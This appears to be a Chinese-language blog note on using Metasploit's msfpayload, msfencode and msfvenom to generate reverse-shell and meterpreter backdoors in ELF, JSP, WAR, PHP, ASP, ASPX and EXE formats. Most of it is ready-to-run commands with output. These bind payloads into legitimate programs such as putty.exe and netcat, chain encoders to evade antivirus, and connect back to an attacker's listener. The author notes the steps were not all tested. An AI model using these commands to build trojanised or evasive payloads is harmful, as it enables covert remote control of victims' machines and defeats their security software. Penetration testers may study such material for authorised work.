文章是以前写的笔记 没有环境做过多的测试. 本文介绍使用msfpayload生成后门,msfencode多payload进行编码处理使其免杀部分杀软.msfpayload与msfencode参数说明执行msfpayload -h查看都有哪些参数 Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
#O--查看payload信息
#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件
#C--输出c程序
执行msfencode -h查看都有哪些参数root@bt:/opt/metasploit/msf3# msfencode -h
Usage: /opt/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff' //避免的字符
-c <opt> The number of times to encode the data //编码次数
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use //选择使用哪种编码器
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders //列出所有可用的编码器
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file //输出文件
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //输出文件的格式
-v Increase verbosity
-x <opt> Specify an alternate executable template
root@bt:/opt/metasploit/msf3# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
生成backdoor类型可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.msfpayload生成linux backdoorroot@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
Created by msfpayload (http://www.).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}
目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试如下图: payload与可执行文件绑定运行,如netcat:root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
[*] x86/alpha_mixed succeeded with size 204 (iteration=1)
高级点的payload meterpreterroot@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
可以使用msfpayload -l | grep linux查找,选择合适自己的.msfpayload生成jsp、war backdoorroot@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
生成war格式后门root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
Created by msfpayload (http://www.).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
root@bt:~# unzip door.war
Archive: door.war
inflating: META-INF/MANIFEST.MF
creating: WEB-INF/
inflating: WEB-INF/web.xml
inflating: sbkuvbujlbr.jsp
inflating: sWDYKoedyqBMERb.txt
root@bt:~#
msfpayload生成php backdoorroot@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
[*] php/base64 succeeded with size 1779 (iteration=1)
如果文件开头和结尾木有php的分界符,那么得自己手动gedit/vim base64php.php一下,在头尾加上即可,否则是不成功的.如图: msfpayload生成asp、aspx backdoorroot@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
msfpayload生成exe backdoorroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
root@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe
msfpayload tips目标是内网时,常用的payload选着如:root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
Antivirus Sandbox Evasion-ultimate-payload.pl$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
reverse_https with basic authentication against proxymsfvenom -p windows/meterpreter/reverse_https_proxy_basicauth -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
还有对生成的payload加壳处理,如upx.ps:这里只是简单的介绍一下如何使用,具体操作还得大家测试,查看shellcode加C参数,如有错误请留言.使用Msfpayload和Msfencode生成backdoor
|